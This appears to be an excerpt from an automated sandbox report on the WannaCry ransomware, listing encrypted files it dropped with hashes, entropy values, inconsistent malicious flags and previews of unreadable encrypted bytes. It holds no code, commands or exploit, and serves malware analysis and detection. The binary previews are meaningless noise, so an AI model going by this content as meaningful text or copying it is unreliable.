                                                                              Preview:WANACRY!.....X....u..pu#X..^......<=}<...i..<./..TRE..!....p..H.,...R..wm.Pt..M...=...\(....:..P....P.0c......<.ne5.-....d.g...m5q.......ZD.l....<.........'..7.!...r...9......!]s....y/.N.$/!|?o.R...N.t..b...vbWE3............=.q.{...pQ..5-....`n...._....T.........\...B..I.W:...:.J.....|H...X?......./..M.H..#s...z..x ..)a.%Vnr.vp..l+%Sc.T..e..*C#..:/...k.XZ|H.*.S.#....K...;.N.{..+.U....v&.........P.Sb...Go....IT.s...y.cggT.>X...2o@.H..*=..r];..o. ...&6/.l.)A....1....w.e.d@.L.aI.y..cO.d.>.B4....X...X?.&.d.........."-..L.,.....=.!^............V...<OH......?...B.@..BY.!..K^...5...{|<.7.)0. }..........EY.`'.B...x.v........~c.3..yPy.f.3.8...N....Q..-J.F{..$..D.~q..j..7Z...^.R.+~u...=>.R..%W.$Bx.".../`........W.....sx`..v.U..|Lz{..>T.....)pe.a`........3D.3"3.#.......s:......CN(....q...*.n..+.Z..{..U_7..u..1.q..<B7qf.E.'./1...X.......@.........R.l?k..X3.Jo ....o.CL..(....o?_[..0..n.Y..%.'.....=..i.._.@#.. ...xl.}o...k.....z...?..u.-...~>m
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8984
                                                                              Entropy (8bit):7.979570219869884
                                                                              Encrypted:false
                                                                              SSDEEP:192:t2GOk41oF8JuSGrcHJ0uVckHEusPOvsGF/B5+UE+0bIb3coGJ:2kz8qcHJwk5sPEB/BsS0b83coGJ
                                                                              MD5:E67B1C6916AF27B224D377E5EC26AB08
                                                                              SHA1:070F5068B5D7AA0B853C3E97B3815C67A5A5A1AE
                                                                              SHA-256:6D132470A586BE6837D6D2CCA8A2B390FF310BFE2573DE38584296D93DD4DF26
                                                                              SHA-512:925B07429A87207AD268552F82FC75B75382FD0A008E8A195B9465A05CBF7B9B9D8B3F8CE1C3A1F40490EABE304888E14F39704D509E2811E5069B335D493C15
                                                                              Malicious:false
                                                                              Preview:WANACRY!....:.... .......O'7:Q.S...d.P.K..+...w..xD...a..E.....|B..W....."...'..{7........L..`.@H...E........%.4....1j b.:C.s5.i....R(....P<.".?..L...E..^..yk...k.T....F.Yo>......TN.....|.jt......$L......].{uo'A%_!.....w6.....,QS{..4....!....hDF.0..8.Uh......!........(WQ...z....U9..s..Rf...P.`..t.%..@.....]J.B.P....J.....^..i.....E..9..J..!.^....T...D.........j1Vs..F../..*.E.....%.....gp..ELK<......W..U.~....V.....U...;j..x.*.]g.x.|1.1..d.....GA:..m.......(......+.......5.J]...Z.dR...V..1.1........$..{.m...6...1..V(a..r..8'.....g.....S:%.OK;... .|..@..+...p...[<...PE...I..y.C<..d$...f%IJc.%.;..ll...'....#.......&B.z%.9.R..y....(..]..7.*/.I6.I....._m.....'.#..{T^.O......f..x.......n.l2."@Q.F..y..::..m.V...I.....z.w=..f$..&bB..NO8[.J<rKB]..LP.A.'." .....].N.8...]aV.....g..k..w72. ..Nt..c:C(.2./..[.......~...+...:....8..:.1...lO<..b..i.@....J.!o...B\.$$..|x..C.J...W."h{;)hI..@Un.'.u+*...5..G<^+.....u........A.[%.D.+......m....'......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8984
                                                                              Entropy (8bit):7.979570219869884
                                                                              Encrypted:false
                                                                              SSDEEP:192:t2GOk41oF8JuSGrcHJ0uVckHEusPOvsGF/B5+UE+0bIb3coGJ:2kz8qcHJwk5sPEB/BsS0b83coGJ
                                                                              MD5:E67B1C6916AF27B224D377E5EC26AB08
                                                                              SHA1:070F5068B5D7AA0B853C3E97B3815C67A5A5A1AE
                                                                              SHA-256:6D132470A586BE6837D6D2CCA8A2B390FF310BFE2573DE38584296D93DD4DF26
                                                                              SHA-512:925B07429A87207AD268552F82FC75B75382FD0A008E8A195B9465A05CBF7B9B9D8B3F8CE1C3A1F40490EABE304888E14F39704D509E2811E5069B335D493C15
                                                                              Malicious:false
                                                                              Preview:WANACRY!....:.... .......O'7:Q.S...d.P.K..+...w..xD...a..E.....|B..W....."...'..{7........L..`.@H...E........%.4....1j b.:C.s5.i....R(....P<.".?..L...E..^..yk...k.T....F.Yo>......TN.....|.jt......$L......].{uo'A%_!.....w6.....,QS{..4....!....hDF.0..8.Uh......!........(WQ...z....U9..s..Rf...P.`..t.%..@.....]J.B.P....J.....^..i.....E..9..J..!.^....T...D.........j1Vs..F../..*.E.....%.....gp..ELK<......W..U.~....V.....U...;j..x.*.]g.x.|1.1..d.....GA:..m.......(......+.......5.J]...Z.dR...V..1.1........$..{.m...6...1..V(a..r..8'.....g.....S:%.OK;... .|..@..+...p...[<...PE...I..y.C<..d$...f%IJc.%.;..ll...'....#.......&B.z%.9.R..y....(..]..7.*/.I6.I....._m.....'.#..{T^.O......f..x.......n.l2."@Q.F..y..::..m.V...I.....z.w=..f$..&bB..NO8[.J<rKB]..LP.A.'." .....].N.8...]aV.....g..k..w72. ..Nt..c:C(.2./..[.......~...+...:....8..:.1...lO<..b..i.@....J.!o...B\.$$..|x..C.J...W."h{;)hI..@Un.'.u+*...5..G<^+.....u........A.[%.D.+......m....'......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5240
                                                                              Entropy (8bit):7.965334269271179
                                                                              Encrypted:false
                                                                              SSDEEP:96:oiBylaLYwytbZLTZx1Cmf4+I2qA6kdAoGmryi3rQP2w37wi5PfaFOBgfihbz7Qj:cUyppZbFQWtsswLf3aFnf037Qj
                                                                              MD5:9C9141B77F36B5F7B595E7E00B01CFE7
                                                                              SHA1:F523C3DA698ACA60A12D79527F0F3DDF061FC5E5
                                                                              SHA-256:08D2C974276FEB6F459F3C0B657D150DE518DAA529C6580232AF003E02D0AB18
                                                                              SHA-512:44854B1B2D73CEA578B499C3FFCB84D7463140E34DD6E4B9338FCF1B7B676C838F37DB594039B59B44265E292DBD00F6F6D86D038FDCA993384BF545D620DFE8
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....MV...Jj..Cr..O/..VR.d..\/{/.aIC.t. ..!x&.......5...!. .ID...lY..E 9...i......L.AO..He...-ezTo..>=.....R.C9.O.R)-...4J.K...(cRgGB...5..AL...W.......Z.!.x..y.!...6.QQ.%.i8...O.M..........u.n.....F<@.n!.......R..e..#......TM.qG8'.;.6.....[@...._.......)...9<...).t.[..W\..C.V#...lr0:L....DK+....D.DaChs.=....G......?..Xb..Q..;h...G!....@J}...`....6.-...<......<..U...3u/q#..c.c...dd\..........s....T.#.T......9..W:.)....l..e.5...e).[F..BK.p....O....[s......9....d...:.9....YOC.....sd.w../..D ...&x.D.~.x.=..g.....Q...?b.{&Q..{Y.J2..q..N_.......$<>w....v.....b._.@k.0]yY..}.6...*LMW...V.Z.BB... ..F..].[*...........*E:[..X.-.I...A~.....d.0...da......E8..z.~...N....ql.(.Da<..v>...w..7.x$..;.C ....2.y.:.7.'.+..7`.C.l....K..V.....(....j..#.s.P../.+aC......._$......~...].n...i.|.s?....w...Ym..N...T.b..J33.a1...6m..O.....&.j,..tad;..p.I.....&6].............SF...f..u.A>^-07........H..S-.8..?..r.D....J.8..%....E..z.-B.........._[..s.....`.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5240
                                                                              Entropy (8bit):7.965334269271179
                                                                              Encrypted:false
                                                                              SSDEEP:96:oiBylaLYwytbZLTZx1Cmf4+I2qA6kdAoGmryi3rQP2w37wi5PfaFOBgfihbz7Qj:cUyppZbFQWtsswLf3aFnf037Qj
                                                                              MD5:9C9141B77F36B5F7B595E7E00B01CFE7
                                                                              SHA1:F523C3DA698ACA60A12D79527F0F3DDF061FC5E5
                                                                              SHA-256:08D2C974276FEB6F459F3C0B657D150DE518DAA529C6580232AF003E02D0AB18
                                                                              SHA-512:44854B1B2D73CEA578B499C3FFCB84D7463140E34DD6E4B9338FCF1B7B676C838F37DB594039B59B44265E292DBD00F6F6D86D038FDCA993384BF545D620DFE8
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....MV...Jj..Cr..O/..VR.d..\/{/.aIC.t. ..!x&.......5...!. .ID...lY..E 9...i......L.AO..He...-ezTo..>=.....R.C9.O.R)-...4J.K...(cRgGB...5..AL...W.......Z.!.x..y.!...6.QQ.%.i8...O.M..........u.n.....F<@.n!.......R..e..#......TM.qG8'.;.6.....[@...._.......)...9<...).t.[..W\..C.V#...lr0:L....DK+....D.DaChs.=....G......?..Xb..Q..;h...G!....@J}...`....6.-...<......<..U...3u/q#..c.c...dd\..........s....T.#.T......9..W:.)....l..e.5...e).[F..BK.p....O....[s......9....d...:.9....YOC.....sd.w../..D ...&x.D.~.x.=..g.....Q...?b.{&Q..{Y.J2..q..N_.......$<>w....v.....b._.@k.0]yY..}.6...*LMW...V.Z.BB... ..F..].[*...........*E:[..X.-.I...A~.....d.0...da......E8..z.~...N....ql.(.Da<..v>...w..7.x$..;.C ....2.y.:.7.'.+..7`.C.l....K..V.....(....j..#.s.P../.+aC......._$......~...].n...i.|.s?....w...Ym..N...T.b..J33.a1...6m..O.....&.j,..tad;..p.I.....&6].............SF...f..u.A>^-07........H..S-.8..?..r.D....J.8..%....E..z.-B.........._[..s.....`.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8840
                                                                              Entropy (8bit):7.982037492502376
                                                                              Encrypted:false
                                                                              SSDEEP:192:fFRY6oPuQTKKSbCTFvn2zCVvVp6H/xkdWr9jV:NG6YuQOj2vn2eVvVq/idIx
                                                                              MD5:ADCDB20ECE42E71CE6A6154A0416836A
                                                                              SHA1:134AABB1F26DDD19726E262364F6F870CC77D847
                                                                              SHA-256:78C1656975CE8A67B5E79B02ECC7A5652A147EE41BC878868DFE94D5A235F059
                                                                              SHA-512:7D77F9B9C8B0848BD0046F0A230A689F74F3C41FB258453712AA0622A0FD2BB8FF9AD374CC153CEAAF796CCC4D1F4CFDA198E4A48AE8976BDE35A5A44DB9A91D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....G..'..$..s..7'yx.h...ZA.Xf^^\.....`\O.1..Pe..OL..T...`/....-XI.Ef/........b-."........@e...Ts...J..XT.....*.'.$.H..P.9...O...!..'.k'....Z.^W.^.E.~...T.......+.Ao...w9.Ph*C.........$:F.Z..P....OQ.>.._0..|5S.?+.....Q.w..x4.^c.vl..:..0......|.......&....i!.......Q.Ve.......WS6...;...4I...o...j......]....1Cs$.R*^I.....'........q....3.......;.k...1..CU.z.J..{...j.{k....\\..x..6H..../......rq..R......~..q.....o..>.m2...s:.S!....;0Q..w.b$.3.kN..6..nt.MJQ+.wH......ewK.......-.h#4+g?..HLx.R..$.G...,:.F.>..4O.."Z......d._k`..D.s2........Di.b%z9t@~.S..*.Yw ......)x....M..h.<Et....~.h.....k.8.h.Q;..T6.%...Y..[U4Z.........>....#z.hiV.SU.i.D}.......t`.W.c....oID...w.B.f......|_...u...].M...u%..Jt..].C.u.k....F.@.#b./.O..S^Pl...Y.1.o....b2U...4...^.>.H....nm.....c.....3i.u....o=P........./<.x.+...o..:c.z.V.{%R..X{?M.....T....<.$..7xh....~.._Z8^e.i...........F.m.....k.^....'.O$.=u...'......y..yh'.8......=.....F.g.....Eu....w.....~.?p'....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8840
                                                                              Entropy (8bit):7.982037492502376
                                                                              Encrypted:false
                                                                              SSDEEP:192:fFRY6oPuQTKKSbCTFvn2zCVvVp6H/xkdWr9jV:NG6YuQOj2vn2eVvVq/idIx
                                                                              MD5:ADCDB20ECE42E71CE6A6154A0416836A
                                                                              SHA1:134AABB1F26DDD19726E262364F6F870CC77D847
                                                                              SHA-256:78C1656975CE8A67B5E79B02ECC7A5652A147EE41BC878868DFE94D5A235F059
                                                                              SHA-512:7D77F9B9C8B0848BD0046F0A230A689F74F3C41FB258453712AA0622A0FD2BB8FF9AD374CC153CEAAF796CCC4D1F4CFDA198E4A48AE8976BDE35A5A44DB9A91D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....G..'..$..s..7'yx.h...ZA.Xf^^\.....`\O.1..Pe..OL..T...`/....-XI.Ef/........b-."........@e...Ts...J..XT.....*.'.$.H..P.9...O...!..'.k'....Z.^W.^.E.~...T.......+.Ao...w9.Ph*C.........$:F.Z..P....OQ.>.._0..|5S.?+.....Q.w..x4.^c.vl..:..0......|.......&....i!.......Q.Ve.......WS6...;...4I...o...j......]....1Cs$.R*^I.....'........q....3.......;.k...1..CU.z.J..{...j.{k....\\..x..6H..../......rq..R......~..q.....o..>.m2...s:.S!....;0Q..w.b$.3.kN..6..nt.MJQ+.wH......ewK.......-.h#4+g?..HLx.R..$.G...,:.F.>..4O.."Z......d._k`..D.s2........Di.b%z9t@~.S..*.Yw ......)x....M..h.<Et....~.h.....k.8.h.Q;..T6.%...Y..[U4Z.........>....#z.hiV.SU.i.D}.......t`.W.c....oID...w.B.f......|_...u...].M...u%..Jt..].C.u.k....F.@.#b./.O..S^Pl...Y.1.o....b2U...4...^.>.H....nm.....c.....3i.u....o=P........./<.x.+...o..:c.z.V.{%R..X{?M.....T....<.$..7xh....~.._Z8^e.i...........F.m.....k.^....'.O$.=u...'......y..yh'.8......=.....F.g.....Eu....w.....~.?p'....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7384
                                                                              Entropy (8bit):7.976202643966814
                                                                              Encrypted:false
                                                                              SSDEEP:96:o/O6f/UXGf7SkxZdXGoTShh8K/x8/31H+UpQ7uG48pm6/qr8Wr3nwQFbX/fU+lhS:Grkvummlq48pW8unZ9vftcxQ0Mvm
                                                                              MD5:3721CBCE6D65DCF37B9133A50CD3F3CC
                                                                              SHA1:8C20FEDE7AB1B33A16FA4521D7AE18891DD7F308
                                                                              SHA-256:4421832936A54D8E8EC8D8584CA2852E761F650EACF4A99AC718526F0E319A96
                                                                              SHA-512:626C14ED5D9DE0D56927A269FBA1C2BB63875B7D7D000DB2CD8DEDE612597086E0A93AF54BA79B7AC294E53FB25192542D2615FCB5368F60EF30DCCCDE2873C8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<.u..w.*......B..l_'`(.....K.3..4.@.|A..@.(M.GgU...2-?N..{,*.s!Mj..t.....E.t.r.w*..j....Fx...7l...5<X....R7.;.\..k.PP..4....y}..vl.S.S.ncq.*.K..)P.(;."t.mTIF:..9...W.m.[U<...F..^...%.m..ko..}u+.V-.>.8p2...5..>.....o....]....&.t.R..W..P..C.............HAH.i5...$a.>.}0......;5.a..v.....g..'.)M.....v..V...._...%.3J^.U.."q.}O...=r#"d)....].F..)C`..z......\.o3..+,...33A.X28L.........:..c...u..5....7...$F.?.. ....$.NQ.K..F.K"...&..}.W..M...=v...?.<...PG..R=..2......op.3/.4E.....c...2~1=.l.-|.........":f...uA...../\.......?.....e....Ia.\]...u.u...:............A_..%.J.om:....gB...'S...,..}.A/....#..-.D]EP3..j..A...f^.tG..u..D......%w.....t....As............<....m[......Z...^..p.F.Zl...W.f...F`.z.........j.......",U~..+51..h....m...M.a$..}.....db.L.....z..0.e.|.Z...w'......F.0...v.........;X.E.e;@.....|..[.[ilkw....?........[/!.K...Uk.jX...k..HC..FM8..{...y....?..%..N.'.|.>......u.L...-!......0G'...^.......}..bP.!Ya.9..kQ=..J.7..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7384
                                                                              Entropy (8bit):7.976202643966814
                                                                              Encrypted:false
                                                                              SSDEEP:96:o/O6f/UXGf7SkxZdXGoTShh8K/x8/31H+UpQ7uG48pm6/qr8Wr3nwQFbX/fU+lhS:Grkvummlq48pW8unZ9vftcxQ0Mvm
                                                                              MD5:3721CBCE6D65DCF37B9133A50CD3F3CC
                                                                              SHA1:8C20FEDE7AB1B33A16FA4521D7AE18891DD7F308
                                                                              SHA-256:4421832936A54D8E8EC8D8584CA2852E761F650EACF4A99AC718526F0E319A96
                                                                              SHA-512:626C14ED5D9DE0D56927A269FBA1C2BB63875B7D7D000DB2CD8DEDE612597086E0A93AF54BA79B7AC294E53FB25192542D2615FCB5368F60EF30DCCCDE2873C8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<.u..w.*......B..l_'`(.....K.3..4.@.|A..@.(M.GgU...2-?N..{,*.s!Mj..t.....E.t.r.w*..j....Fx...7l...5<X....R7.;.\..k.PP..4....y}..vl.S.S.ncq.*.K..)P.(;."t.mTIF:..9...W.m.[U<...F..^...%.m..ko..}u+.V-.>.8p2...5..>.....o....]....&.t.R..W..P..C.............HAH.i5...$a.>.}0......;5.a..v.....g..'.)M.....v..V...._...%.3J^.U.."q.}O...=r#"d)....].F..)C`..z......\.o3..+,...33A.X28L.........:..c...u..5....7...$F.?.. ....$.NQ.K..F.K"...&..}.W..M...=v...?.<...PG..R=..2......op.3/.4E.....c...2~1=.l.-|.........":f...uA...../\.......?.....e....Ia.\]...u.u...:............A_..%.J.om:....gB...'S...,..}.A/....#..-.D]EP3..j..A...f^.tG..u..D......%w.....t....As............<....m[......Z...^..p.F.Zl...W.f...F`.z.........j.......",U~..+51..h....m...M.a$..}.....db.L.....z..0.e.|.Z...w'......F.0...v.........;X.E.e;@.....|..[.[ilkw....?........[/!.K...Uk.jX...k..HC..FM8..{...y....?..%..N.'.|.>......u.L...-!......0G'...^.......}..bP.!Ya.9..kQ=..J.7..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):14408
                                                                              Entropy (8bit):7.986696254739371
                                                                              Encrypted:false
                                                                              SSDEEP:384:Pg/dMJO6w9nFLfGjwza8Es3aSd6czsHZViRmHgVL5kfoyy1+2e:YFMJO6w3TGO5dZhwg1kG1e
                                                                              MD5:10B0BAB1FBE33921128CAD1364981DA6
                                                                              SHA1:AD0DF481D79452F09AF6695700C58A26885557CC
                                                                              SHA-256:902EE53EDA18D3805A8C8D3F63F71CDADF82C7D3A0BBE4CF103FF890CA7F1BA3
                                                                              SHA-512:CF4E387D1CDBB067F5238DC9F0A89EE1E313975F073E8F96367B4BCA486299021A7FFF433E3DDED2FAB899EBC913873596196D60095AD30D3F1937C062BE0D38
                                                                              Malicious:false
                                                                              Preview:WANACRY!....!..W.O5...{.u..F..+...Ys.....b.`5..Lc.Du(.+.cC....M..Ma4./y`X8'.....9...A...\.%....dx.P.hU..{.~V.....o...)..'<....U.c....dy.Q~.!.x.....G.u.....SM.....8.C.7.FR......g..~.......T..?.Z.....H!.....EEY.p.....t.._.)....i.m(%...B.G.....0k.................+7......U.fivg:..1.9.........F..]CdwQ...H..V.f{3.{.....ZE.G7.kt(G.....~!..,l>..;.cSW_I.4{y..v.c...r.H(...[....{*..m.maAM..5K.......u{..w"(n..AU_..\...b!...F....K.8#..M.p.........]7)...v.G...X)..,_....DR"@f....C&vl..\....l.9..S.;....`k....8...CJ\.. ....b.w...S.r....H.Q.r,)Gh.S&VQ.....2..6.A..z.2.H`.....$..x..]r#.?....."lZ8..h..Jtr....>.xmbI.F%$..+..Zw$k\.|.....Q.fuh...1..Rf..L.J..*!..a.Y~..'.4-....Z....vt..k{T.........:../F...p./}...4$,..4.q.tB.....0.l..r...CC+.5.S..{l.Ux....P..|..n..j..7.`.(.\.v{7.$.%.+%..?.W.t.H.....Qee..P..&g.....#Py...z2*...i....0..2fhS+#.?.Y..F.].b..bz .K.o..H.u..W........)/.N......D..t..\.yN7f...P..._&.E......P..4.H...H....T....P\<...+..)R..-"^._..4.F.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):14408
                                                                              Entropy (8bit):7.986696254739371
                                                                              Encrypted:false
                                                                              SSDEEP:384:Pg/dMJO6w9nFLfGjwza8Es3aSd6czsHZViRmHgVL5kfoyy1+2e:YFMJO6w3TGO5dZhwg1kG1e
                                                                              MD5:10B0BAB1FBE33921128CAD1364981DA6
                                                                              SHA1:AD0DF481D79452F09AF6695700C58A26885557CC
                                                                              SHA-256:902EE53EDA18D3805A8C8D3F63F71CDADF82C7D3A0BBE4CF103FF890CA7F1BA3
                                                                              SHA-512:CF4E387D1CDBB067F5238DC9F0A89EE1E313975F073E8F96367B4BCA486299021A7FFF433E3DDED2FAB899EBC913873596196D60095AD30D3F1937C062BE0D38
                                                                              Malicious:false
                                                                              Preview:WANACRY!....!..W.O5...{.u..F..+...Ys.....b.`5..Lc.Du(.+.cC....M..Ma4./y`X8'.....9...A...\.%....dx.P.hU..{.~V.....o...)..'<....U.c....dy.Q~.!.x.....G.u.....SM.....8.C.7.FR......g..~.......T..?.Z.....H!.....EEY.p.....t.._.)....i.m(%...B.G.....0k.................+7......U.fivg:..1.9.........F..]CdwQ...H..V.f{3.{.....ZE.G7.kt(G.....~!..,l>..;.cSW_I.4{y..v.c...r.H(...[....{*..m.maAM..5K.......u{..w"(n..AU_..\...b!...F....K.8#..M.p.........]7)...v.G...X)..,_....DR"@f....C&vl..\....l.9..S.;....`k....8...CJ\.. ....b.w...S.r....H.Q.r,)Gh.S&VQ.....2..6.A..z.2.H`.....$..x..]r#.?....."lZ8..h..Jtr....>.xmbI.F%$..+..Zw$k\.|.....Q.fuh...1..Rf..L.J..*!..a.Y~..'.4-....Z....vt..k{T.........:../F...p./}...4$,..4.q.tB.....0.l..r...CC+.5.S..{l.Ux....P..|..n..j..7.`.(.\.v{7.$.%.+%..?.W.t.H.....Qee..P..&g.....#Py...z2*...i....0..2fhS+#.?.Y..F.].b..bz .K.o..H.u..W........)/.N......D..t..\.yN7f...P..._&.E......P..4.H...H....T....P\<...+..)R..-"^._..4.F.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048
                                                                              Entropy (8bit):7.777482060211136
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk0JsxlmNbUiWb4Xrol6JPCLm858lB0dDs7OmDJVhgDjqD:bk8Nb3WUXrY5Bw0dDsqmNM/W
                                                                              MD5:9713D42AF4F0DBF8DB1D6292B63542AA
                                                                              SHA1:2E3D5C1637E35428DB700BA8172921AA9D24543A
                                                                              SHA-256:C3CD0AA85A263283EF895838F7024A52018A43F5B453D77EEB0B159C55A937F4
                                                                              SHA-512:7D682A0418442D0DE425544B31626E981D07144A5675D4AF8790110E340F1A6C1CD5BBBCE1B8A044A4BAFE1660C0EA7182D1BD4131D831946BBE7072BF7F81B6
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........n.a.Lv.=......U.H...&.{.._. XB5.$...;J_?T...$".:....,..p.~.U....(...h.$."..S....;.4.?..hh..[.|.f.1...R_..l.x....h...P[&..*GyO........ph.5....n.R<..........."...G._[-,..i....N.......fvs.....S.o.q.......H~..Z/...71.]..2..9c..A.....BotM.m................).Uc.?.{............@.P.A..gB...uI.#../y...JBB.-.6mX...n.c...W..u...5..j......r._.M.E.:..h..DPB...k...L.~-.>k{XP.....q....@@R......%f...3k.U.h.)B....7.....c9.q.......)1.....%.c........[...?V.gQ..?...6...D6S.7.;..>....Z<......A9...x.....RB.2..m............^...L...z....'.W&...Uz......L...I......w.<.d...(E...,X.9~.i$ON.8.A..v.I.4Wo.....f...Eds.F...W......%..o`D..L.'.p8.9.u..{.*.....*y.&.....8.g......qD.g...\......."q.3...w...#....!T._.....!..7....(..,J....$.0q..D.Yso.._.GU.E...(.."WQK....;pB.....+o.e...B[.l.n.o......>......e .R....3.c..Yn.$.rr=>...EN.=.yK....&....y\.....PF..L..K\...9..i.u..>....DM...:..%.........._...7......*.r.o7.../.2K....."1......8V.._;.`..A...H.&....i...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048
                                                                              Entropy (8bit):7.777482060211136
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk0JsxlmNbUiWb4Xrol6JPCLm858lB0dDs7OmDJVhgDjqD:bk8Nb3WUXrY5Bw0dDsqmNM/W
                                                                              MD5:9713D42AF4F0DBF8DB1D6292B63542AA
                                                                              SHA1:2E3D5C1637E35428DB700BA8172921AA9D24543A
                                                                              SHA-256:C3CD0AA85A263283EF895838F7024A52018A43F5B453D77EEB0B159C55A937F4
                                                                              SHA-512:7D682A0418442D0DE425544B31626E981D07144A5675D4AF8790110E340F1A6C1CD5BBBCE1B8A044A4BAFE1660C0EA7182D1BD4131D831946BBE7072BF7F81B6
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........n.a.Lv.=......U.H...&.{.._. XB5.$...;J_?T...$".:....,..p.~.U....(...h.$."..S....;.4.?..hh..[.|.f.1...R_..l.x....h...P[&..*GyO........ph.5....n.R<..........."...G._[-,..i....N.......fvs.....S.o.q.......H~..Z/...71.]..2..9c..A.....BotM.m................).Uc.?.{............@.P.A..gB...uI.#../y...JBB.-.6mX...n.c...W..u...5..j......r._.M.E.:..h..DPB...k...L.~-.>k{XP.....q....@@R......%f...3k.U.h.)B....7.....c9.q.......)1.....%.c........[...?V.gQ..?...6...D6S.7.;..>....Z<......A9...x.....RB.2..m............^...L...z....'.W&...Uz......L...I......w.<.d...(E...,X.9~.i$ON.8.A..v.I.4Wo.....f...Eds.F...W......%..o`D..L.'.p8.9.u..{.*.....*y.&.....8.g......qD.g...\......."q.3...w...#....!T._.....!..7....(..,J....$.0q..D.Yso.._.GU.E...(.."WQK....;pB.....+o.e...B[.l.n.o......>......e .R....3.c..Yn.$.rr=>...EN.=.yK....&....y\.....PF..L..K\...9..i.u..>....DM...:..%.........._...7......*.r.o7.../.2K....."1......8V.._;.`..A...H.&....i...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):114968
                                                                              Entropy (8bit):7.998309087323046
                                                                              Encrypted:true
                                                                              SSDEEP:3072:HS9mJitkCLY2wDCLCJvE153AWV3SbH61FP:y9oukCLiDep5QWzv
                                                                              MD5:5115FC70A2160F99CFD370296C5500A7
                                                                              SHA1:426B3770D59234867BED401157D35C2D41FBFECF
                                                                              SHA-256:8505F0FB878937A647F9C9459C2EF5D936BB53D9AB9376729D4288F57C542F4B
                                                                              SHA-512:0DBC4E2D698A066CFCE8EC7D357900304277A68DC77CBE696A4348915BD9208AEB5151D7A1765B8A12FFA7ECE7E770294BCE7E41CB2847C9EA620E36577F405D
                                                                              Malicious:true
                                                                              Preview:WANACRY!....t.6.BM.L..S%A.{^Ny........{..=....0-....lr9c....;....*....l..YS...C[$.8..l....`......BA...f.K...aF.K.@ ...........:I:..6.....b....s../...\..p.....Q.6C....q.......#..4@v..-mS..k...M~..%....ft$.6&..L".......h.C..U*.$....Z...F=.{...F.w....7.L............p..8..b..,8R....7..........6p..Y9..!z....F.`8.J.*..../BH........O.c.>..?mtaH...D*.pD.?....@....B..0.X...a...........|;|.kf...."...t.[.;}..Q0K.:...#'k....3F...i.#..ba8.].4.....;Jf.H...I#...........O.H.H..L%.=..w....=.C..6b...v}3..x....3...7m...m.Vgq......H .g`./p...a.m.f...K....3...b.0F.TU..).@.......Y.^..2.QX.U..{..a.>#.._3....g\.e.i..y.f.Z..e"....x.<../>.X&I...{.>N..v.."..M'$i.......U.<~........Vi.{:...ny._.<.......f.S.U....Z.g..}....G.c..&..U....O!..\.P..=zl%..V.+=q.....J......5in..i.h...\.Q.v..m.j......TM.....;...tQFh..8rg.TH/......G.......H......#.....Y..WY.X.1.Y.b#ov..OO...q.....j(.<`.K..{....5E.T.^d...l... .q..ug...76w.v.*.bq,7D:..J.m.J..X$.1..I.....m.....+..*j...[.h
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):114968
                                                                              Entropy (8bit):7.998309087323046
                                                                              Encrypted:true
                                                                              SSDEEP:3072:HS9mJitkCLY2wDCLCJvE153AWV3SbH61FP:y9oukCLiDep5QWzv
                                                                              MD5:5115FC70A2160F99CFD370296C5500A7
                                                                              SHA1:426B3770D59234867BED401157D35C2D41FBFECF
                                                                              SHA-256:8505F0FB878937A647F9C9459C2EF5D936BB53D9AB9376729D4288F57C542F4B
                                                                              SHA-512:0DBC4E2D698A066CFCE8EC7D357900304277A68DC77CBE696A4348915BD9208AEB5151D7A1765B8A12FFA7ECE7E770294BCE7E41CB2847C9EA620E36577F405D
                                                                              Malicious:true
